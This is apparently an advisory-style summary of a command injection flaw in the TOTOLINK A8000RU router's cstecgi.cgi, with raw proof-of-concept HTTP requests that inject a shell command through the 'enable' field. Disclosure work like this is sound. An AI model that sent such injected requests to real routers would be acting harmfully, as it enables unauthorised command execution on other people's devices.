# A8000RU Command Injection Vulnerability Summary ## Vulnerability Overview The TOTOLINK A8000RU router has a command injection vulnerability. An attacker can execute arbitrary operating system commands via crafted requests in `cstecgi.cgi`. ## Impact Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643_b20200521 - **Vulnerability Type**: Command Injection ## Remediation Currently, no specific remediation or patch information is provided on the page. It is recommended to contact the vendor for updates. ## Proof of Concept (PoC) ### HTTP Request Example ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 77 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=1772465782.2 Connection: keep-alive {"topcurl":"setUriFilterRules","enable":"ls /ssetUriFilterRules.txt"} ``` ### Request Details ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.1 Content-Length: 76 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Origin: http://192.168.6.1 Referer: http://192.168.6.1/phone/login.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=21772465782.2 Connection: keep-alive {"topcurl":"setUriFilterRules","enable":"ls /ssetUriFilterRules.txt"} ``` ### Response Details ```http HTTP/1.1 200 OK Date: Fri, 27 Mar 2026 03:21:33 GMT Server: Lighttpd/1.4.30 Content-Length: 233 Content-Type: application/json {"success":true,"error":null,"lan_ip":"192.168.0.1","wlan":"0","reason":"reason"} ```